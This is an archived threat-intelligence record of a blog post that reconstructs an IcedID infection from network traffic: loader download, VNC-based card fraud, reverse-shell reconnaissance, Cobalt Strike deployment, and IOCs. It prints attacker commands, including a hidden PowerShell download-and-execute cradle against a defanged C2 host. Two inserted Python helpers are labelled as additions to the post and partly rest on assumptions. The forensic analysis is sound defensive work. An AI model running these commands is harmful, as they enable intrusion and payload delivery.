{
	"id": "07d2a090-aeab-40b1-b561-5a24a2ad68fb",
	"created_at": "2026-04-06T00:10:56.179504Z",
	"updated_at": "2026-04-10T13:11:40.630553Z",
	"deleted_at": null,
	"sha1_hash": "5b7d0b352fefb6bb468045f8b3e19b801628002f",
	"title": "Forensic Timeline of an IcedID Infection",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 576122,
	"plain_text": "Forensic Timeline of an IcedID Infection\r\nBy Erik Hjelmvik\r\nPublished: 2023-10-12 · Archived: 2026-04-05 22:48:46 UTC\r\nThursday, 12 October 2023 13:23:00 (UTC/GMT)\r\nThe BackConnect and VNC parsers that were added to NetworkMiner 2.8.1 provide a unique opportunity to trace the steps of an attacker with the help of network traffic captured from a hacked computer.\r\nIn this blog post I use the free and open source version of NetworkMiner to see how GzipLoader downloads IcedID, after which the attacker deploys BackConnect VNC to purchase an iPhone 14 with a stolen credit card and then drops Cobalt Strike on the victim PC.\r\nThe analyzed pcap is 2022-10-31-IcedID-with-DarkVNC-and-Cobalt-Strike-full-pcap-raw.pcap from Brad Duncan's malware-traffic-analysis.net blog.\r\nSafety First\r\nI ran NetworkMiner in a Windows Sandbox when analyzing this PCAP file to avoid accidentally infecting my computer with any of the malicious artifacts that NetworkMiner extracts from the network traffic.\r\nAnother safe way to analyze Windows malware traffic is to run NetworkMiner on Linux or macOS, where the extracted Windows binaries cannot execute natively.\r\n14:47 GzipLoader\r\nThis infection starts with GzipLoader (aka “IcedID Downloader”) reaching out to its C2 server on vgiragdoffy[.]com (67.205.184.237:80) to download IcedID.\r\nhttps://www.netresec.com/?page=Blog\u0026month=2023-10\u0026post=Forensic-Timeline-of-an-IcedID-Infection\r\nPage 1 of 17\n\nImage: Cookie parameters from GzipLoader request\r\nThe “_gat” cookie value in frame number 6 tells us that the victim machine is running Windows 10 build 19045 (aka 22H2). The long “_u” value contains the victim’s username and hostname in hexadecimal representation, and the “__io” value is the logged-in user’s SID. 
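The cookie decoding described above, written out as an added example that is not part of the original post or of NetworkMiner's own code: a small Python decoder for the GzipLoader Cookie header. The meaning of _gat, _u and __io follows the text above; the exact layout of _gat (major.minor.build.arch) and the ':' separator between hostname and username inside _u are my assumptions, and the sample header is constructed for the example rather than taken from the pcap.

```python
# Added example, not from the original post or from NetworkMiner: decode the
# GzipLoader (IcedID downloader) Cookie header fields described in the text.
# Field meaning per the text: _gat = Windows version/build, _u = hostname and
# username hex-encoded, __io = SID of the logged-in user.
# ASSUMPTIONS (not stated on the page): _gat is laid out as
# major.minor.build.arch, and the decoded _u reads HOSTNAME:username.
import re
from dataclasses import dataclass, field
from typing import Optional

# Marketing names for a few Windows builds; 19045 is the 22H2 build seen in the pcap.
WINDOWS_BUILDS = {
    19041: 'Windows 10 2004',
    19042: 'Windows 10 20H2',
    19043: 'Windows 10 21H1',
    19044: 'Windows 10 21H2',
    19045: 'Windows 10 22H2',
    22000: 'Windows 11 21H2',
    22621: 'Windows 11 22H2',
    22631: 'Windows 11 23H2',
}

# _gat layout is an assumption: dotted decimals, the third field being the build.
GAT_PATTERN = re.compile(r'([0-9]+)[.]([0-9]+)[.]([0-9]+)(?:[.]([0-9]+))?')
# Windows account SIDs look like S-1-5-21-<three sub-authorities>-<RID>.
SID_PATTERN = re.compile(r'S-1-5-21(?:-[0-9]+){4}')


@dataclass
class VictimInfo:
    hostname: Optional[str] = None
    username: Optional[str] = None
    sid: Optional[str] = None
    build: Optional[int] = None
    os_name: Optional[str] = None
    raw: dict = field(default_factory=dict)


def parse_cookie_header(header: str) -> dict:
    '''Split a Cookie header ('a=1; b=2') into a dict, ignoring empty parts.'''
    fields = {}
    for part in header.split(';'):
        name, _, value = part.strip().partition('=')
        if name:
            fields[name] = value.strip()
    return fields


def decode_u(value: str):
    '''Hex-decode _u. ASSUMPTION: the plaintext is HOSTNAME:username.'''
    if not value:
        return None, None
    try:
        text = bytes.fromhex(value).decode('utf-8', errors='replace')
    except ValueError:          # odd length or non-hex characters
        return None, None
    host, sep, user = text.partition(':')
    return host, (user if sep else None)


def decode_gat(value: str) -> Optional[int]:
    '''Return the Windows build number from _gat, or None if it does not parse.'''
    match = GAT_PATTERN.fullmatch(value)
    return int(match.group(3)) if match else None


def decode_gziploader_cookie(header: str) -> VictimInfo:
    '''Turn one GzipLoader Cookie header into the fields NetworkMiner lists under Hosts.'''
    fields = parse_cookie_header(header)
    host, user = decode_u(fields.get('_u', ''))
    build = decode_gat(fields.get('_gat', ''))
    sid = fields.get('__io', '')
    return VictimInfo(
        hostname=host,
        username=user,
        sid=sid if SID_PATTERN.fullmatch(sid) else None,
        build=build,
        os_name=WINDOWS_BUILDS.get(build),
        raw=fields,
    )


# Constructed sample header (hostname DESKTOP-TEST01, user alice). The other
# cookie names are filler for the example; all values here are made up.
SAMPLE_HEADER = (
    '__gads=' + '1' * 20 + '; _gat=10.0.19045.64; _ga=1.2.3.4; '
    '_u=' + b'DESKTOP-TEST01:alice'.hex() + '; '
    '__io=S-1-5-21-1111111111-2222222222-3333333333-1001; _gid=5.6.7'
)

if __name__ == '__main__':
    info = decode_gziploader_cookie(SAMPLE_HEADER)
    print(f'{info.hostname} / {info.username} / {info.sid} / {info.os_name} (build {info.build})')
```

Run it against the Cookie header of frame 6 (copied from the HTTP request in Wireshark or NetworkMiner) instead of SAMPLE_HEADER to recover the same hostname, username, SID and build that the Hosts tab shows; a malformed _u or a value that is not a SID comes back as None rather than as garbage.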
NetworkMiner decodes these values from the GzipLoader request and displays them in the Hosts tab.\r\nImage: Hostname, SID, username and Windows version extracted from GzipLoader cookie\r\nFor more info about the GzipLoader cookie, see IcedID PhotoLoader evolution by Jason Reaves and the eSentire blog post on Gootloader and IcedID.\r\nThe response to this GzipLoader request is a 550 kB file (MD5 700c602086590b05dde8df57933c7e68) with a fake gzip header. This file actually contains the IcedID DLL (Odwikp.dll) and its license.dat file.\r\nImage: Fake gzip file containing IcedID\r\n14:47 IcedID\r\nThe banking trojan IcedID (aka BokBot) gets launched at 14:47:29 UTC (frame 641), after which it connects to these four IcedID servers used for payload delivery and C2:\r\nringashopsu[.]com = 137.184.208.116\r\nsainforgromset[.]com = 138.68.255.102\r\nyeloypod[.]hair = 94.140.114.103\r\nairsaintol[.]beauty = 66.63.168.75\r\nImage: JA3S hash of C2 server\r\nThese four IcedID servers all run TLS services with self-signed certificates issued for \"localhost\" and perform TLS handshakes with JA3S hash ec74a5c51106f0419184d0dd08fb05bc. 
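How a JA3S value like the one above is derived, as an added example that is not part of the original post or of NetworkMiner: the Python below parses one raw TLS ServerHello record and computes JA3S as the MD5 of 'version,cipher,ext1-ext2-...' in decimal, which is how Salesforce defines JA3S. The ServerHello bytes are constructed for the example and do not reproduce the hash ec74a5c51106f0419184d0dd08fb05bc; feed it the ServerHello from one of the C2 sessions in the pcap to reproduce that one.

```python
# Added example, not from the original post or from NetworkMiner: derive a
# JA3S fingerprint from one raw TLS ServerHello record.
# JA3S (Salesforce) = MD5 of 'Version,Cipher,Ext1-Ext2-...' with every number
# in decimal, taken from the ServerHello a server returns for a given ClientHello.
# The ServerHello used below is constructed for the example and does not
# reproduce the pcap's hash ec74a5c51106f0419184d0dd08fb05bc.
import hashlib
import struct

HANDSHAKE_RECORD = 0x16
SERVER_HELLO = 0x02


def parse_server_hello(record: bytes):
    '''Return (version, cipher, [extension types]) from a TLS record holding a
    ServerHello. Raises ValueError for any other or truncated input.'''
    if len(record) < 5 or record[0] != HANDSHAKE_RECORD:
        raise ValueError('not a TLS handshake record')
    rec_len = struct.unpack('!H', record[3:5])[0]
    body = record[5:5 + rec_len]
    if len(body) != rec_len or len(body) < 4 or body[0] != SERVER_HELLO:
        raise ValueError('not a complete ServerHello handshake message')
    hs_len = int.from_bytes(body[1:4], 'big')
    hs = body[4:4 + hs_len]
    if len(hs) != hs_len:
        raise ValueError('truncated ServerHello')

    pos = 0

    def take(n: int) -> bytes:
        # Read n bytes at pos, refusing to run past the handshake message.
        nonlocal pos
        if pos + n > len(hs):
            raise ValueError('ServerHello shorter than its fields require')
        chunk = hs[pos:pos + n]
        pos += n
        return chunk

    version = struct.unpack('!H', take(2))[0]
    take(32)                                   # server random
    take(take(1)[0])                           # legacy session id (length-prefixed)
    cipher = struct.unpack('!H', take(2))[0]
    take(1)                                    # compression method
    extensions = []
    if pos < len(hs):                          # the extensions block is optional
        ext_total = struct.unpack('!H', take(2))[0]
        if pos + ext_total != len(hs):
            raise ValueError('extensions length disagrees with message length')
        while pos < len(hs):
            ext_type, ext_len = struct.unpack('!HH', take(4))
            take(ext_len)                      # extension payload is not part of JA3S
            extensions.append(ext_type)
    return version, cipher, extensions


def ja3s_string(record: bytes) -> str:
    version, cipher, extensions = parse_server_hello(record)
    ext_part = '-'.join(str(e) for e in extensions)
    return f'{version},{cipher},{ext_part}'


def ja3s_hash(record: bytes) -> str:
    return hashlib.md5(ja3s_string(record).encode('ascii')).hexdigest()


def is_server_hello(record: bytes) -> bool:
    try:
        parse_server_hello(record)
        return True
    except ValueError:
        return False


def build_server_hello(version: int, cipher: int, extensions) -> bytes:
    '''Assemble a minimal ServerHello record (test fixture, not captured traffic).'''
    ext_block = b''.join(struct.pack('!HH', t, len(d)) + d for t, d in extensions)
    hs = (struct.pack('!H', version) + bytes(32) + bytes([0])
          + struct.pack('!H', cipher) + bytes([0])
          + struct.pack('!H', len(ext_block)) + ext_block)
    body = bytes([SERVER_HELLO]) + len(hs).to_bytes(3, 'big') + hs
    return bytes([HANDSHAKE_RECORD, 0x03, 0x03]) + struct.pack('!H', len(body)) + body


# TLS 1.2 (0x0303 = 771), TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (0xC02F = 49199),
# extensions renegotiation_info (65281), ec_point_formats (11), extended_master_secret (23).
SAMPLE_SERVER_HELLO = build_server_hello(
    0x0303, 0xC02F,
    [(0xFF01, bytes([0])), (0x000B, bytes([1, 0])), (0x0017, b'')],
)

if __name__ == '__main__':
    print(ja3s_string(SAMPLE_SERVER_HELLO), ja3s_hash(SAMPLE_SERVER_HELLO))
```

Keep in mind that a server answers different ClientHellos with different ServerHellos, so a JA3S value only identifies a server in combination with the client that talked to it. The IcedID bot always sends the same ClientHello, which is why all four C2 servers here end up with one stable JA3S hash that works as a filter.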
Both of these properties can be used as filters in NetworkMiner's Hosts tab to display only the IcedID C2 servers.\r\nImage: Self-signed certificate from ringashopsu[.]com\r\n14:59 BackConnect and Keyhole VNC\r\nShortly after the IcedID C2 traffic has started, the IcedID bot also initiates BackConnect C2 connections to 137.74.104.108 on TCP port 8080 (frame 4505 at 14:59:14 UTC).\r\nImage: IcedID BackConnect communication\r\nThe BackConnect C2 server tells the bot to sleep for 60 seconds two times before launching a reverse VNC session with command 0x11 (frame 4530 at 15:01:09 UTC).\r\nImage: BackConnect VNC screenshots\r\nImage: Screenshot of attacker’s view of victim screen (Keyhole VNC)\r\n15:06 Apple Store\r\nImage: Attacker’s keystrokes extracted from BackConnect VNC traffic\r\nThe keylog of the attacker above reveals that the attacker is typing “iphone 14 apple store buy”. 
The VNC graphics that NetworkMiner extracted from the PCAP file additionally reveal that this was a Google search query typed into an Edge browser.\r\nImage: Google search results from reverse VNC session\r\n15:10 Credit Card payment\r\nThe attacker proceeds to the Apple Store, puts a black iPhone 14 Plus for $987.99 into the shopping cart, enters a delivery address in West Hartford (US) and then inputs credit card details for the payment.\r\nImage: Credit card details entered in Apple Store by attacker\r\nLuckily, the transaction was denied by the Apple Store.\r\nImage: Payment authorization failed\r\n15:12 Reverse Shell\r\nAfter having failed to buy an iPhone through the hacked computer, the attacker instead opens three reverse shell sessions using the BackConnect C2 channel.\r\nThese three commands are issued in the first reverse shell session:\r\nnet group \"domain admins\" /dom\r\narp -a\r\ndir \\\\172.16.0.12\\c$\r\nIn the second shell session the attacker first runs these three commands:\r\nshell net group \"domain admins\" /dom\r\nnet group \"domain admins\" /dom\r\nnltest /domain_trusts /all_trusts\r\n...and then starts a file manager session through the BackConnect C2 channel.\r\n15:40 Deploy Cobalt Strike\r\nThe BackConnect file manager is used to upload a Cobalt Strike binary called P2.dll to \"C:\\ProgramData\\\" on the victim computer in frame 144535.\r\nImage: Cobalt Strike delivered to victim through BackConnect's File Manager\r\nThe uploaded 
P2.dll is then executed by running this command in the reverse shell session (frame 144707):\r\nrundll32 c:\\programdata\\P2.dll,DllRegisterServer\r\nNetworkMiner extracts this uploaded DLL from the BackConnect network traffic.\r\nImage: Files extracted from network traffic\r\nImage: Details for Cobalt Strike P2.dll\r\nAs you can see in the screenshot above, the MD5 hash of P2.dll is cc69a31a067b62dda5f2076f8ee335e1. This file is flagged as malicious by most AV vendors (P2.dll on VT). However, none of them label it as Cobalt Strike. Luckily I was able to use Triage's malware config extractor to verify that this was indeed Cobalt Strike (P2.dll on tria.ge). Triage also revealed that the Cobalt Strike C2 URL was clouditsoft[.]com:8008/static-directory/mg.jpg\r\nAfter the DLL gets executed, the victim PC establishes Cobalt Strike beacon C2 connections to clouditsoft[.]com on port 8008 (frame 144715).\r\nImage: Cobalt Strike beacon sessions\r\n15:41 MOAR COBALT STRIKE\r\nThe BackConnect Reverse Shell log in NetworkMiner's Parameters tab shows that the attacker also attempted to download Cobalt Strike using PowerShell at 15:41:59 UTC (frame 145176) with this command:\r\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('https://clouditsoft[.]com:8008/lass'))\"\r\nIOC List\r\nIP:port 67.205.184.237:80 (GzipLoader)\r\nDNS vgiragdoffy[.]com (GzipLoader)\r\nMD5 700c602086590b05dde8df57933c7e68 (Fake gzip file)\r\nMD5 f57ab2e5e5720572d5eb19010ec8dcb4 (IcedID Odwikp.dll from fake gzip)\r\nMD5 
57a9d9acb389bd74a7423a16ef81ac18 (IcedID license.dat from fake gzip)\r\nDNS ringashopsu[.]com (IcedID C2)\r\nDNS sainforgromset[.]com (IcedID C2)\r\nDNS yeloypod[.]hair (IcedID C2)\r\nDNS airsaintol[.]beauty (IcedID C2)\r\nIP:port 137.184.208.116:443 (IcedID C2)\r\nIP:port 138.68.255.102:443 (IcedID C2)\r\nIP:port 94.140.114.103:443 (IcedID C2)\r\nIP:port 66.63.168.75:443 (IcedID C2)\r\nJA3S hash ec74a5c51106f0419184d0dd08fb05bc (IcedID C2)\r\nIP:port 137.74.104.108:8080 (IcedID BackConnect C2)\r\nMD5 cc69a31a067b62dda5f2076f8ee335e1 (Cobalt Strike P2.dll)\r\nDNS clouditsoft[.]com (Cobalt Strike C2)\r\nIP:port 198.44.140.67:8008 (Cobalt Strike C2)\r\nPosted by Erik Hjelmvik on Thursday, 12 October 2023 13:23:00 (UTC/GMT)\r\nTags: #NetworkMiner #IcedID #GzipLoader #BackConnect #VNC #Keyhole #CobaltStrike #Cobalt Strike #Windows Sandbox #ec74a5c51106f0419184d0dd08fb05bc #JA3S\r\nSource: https://www.netresec.com/?page=Blog\u0026month=2023-10\u0026post=Forensic-Timeline-of-an-IcedID-Infection",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.netresec.com/?page=Blog\u0026month=2023-10\u0026post=Forensic-Timeline-of-an-IcedID-Infection"
	],
	"report_names": [
		"?page=Blog\u0026month=2023-10\u0026post=Forensic-Timeline-of-an-IcedID-Infection"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434256,
	"ts_updated_at": 1775826700,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5b7d0b352fefb6bb468045f8b3e19b801628002f.pdf",
		"text": "https://archive.orkl.eu/5b7d0b352fefb6bb468045f8b3e19b801628002f.txt",
		"img": "https://archive.orkl.eu/5b7d0b352fefb6bb468045f8b3e19b801628002f.jpg"
	}
}